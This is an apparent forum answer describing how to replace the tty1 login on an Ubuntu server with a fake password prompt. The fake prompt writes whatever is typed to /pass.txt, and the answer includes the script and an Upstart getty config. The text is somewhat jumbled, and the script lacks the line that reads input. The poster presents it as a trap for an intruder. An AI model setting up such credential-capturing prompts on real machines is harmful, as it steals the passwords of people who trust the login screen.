Well, assuming this is a lucid server, and they are attempting to login to the terminal at tty1, create this script
make it executable
echo -n "Password: "
echo $@ $PASS >> /pass.txt
echo Your password was logged!
configure the getty on tty1 to launch that script instead of /bin/login
sudo chmod 700 /usr/local/bin/pass.sh
then reboot. Now when somone attempts to login at tty1, it will fail with "Your password was logged!" and log their password to "/pass.txt". Just make sure to switch terminals (ctrl+alt+f2) before YOU login.
# tty1 - getty
# This service maintains a getty on tty1 from the point the system is
# started until it is shut down again.
start on stopped rc RUNLEVEL=
stop on runlevel [!2345]
exec /sbin/getty -l /usr/local/bin/pass.sh -8 38400 tty1
Sorry for the skepticism, but I wanted to at least establish that there is a legitimate reason for me to post this code before I provided a solution which someone like your attacker could potentially use to steal your password.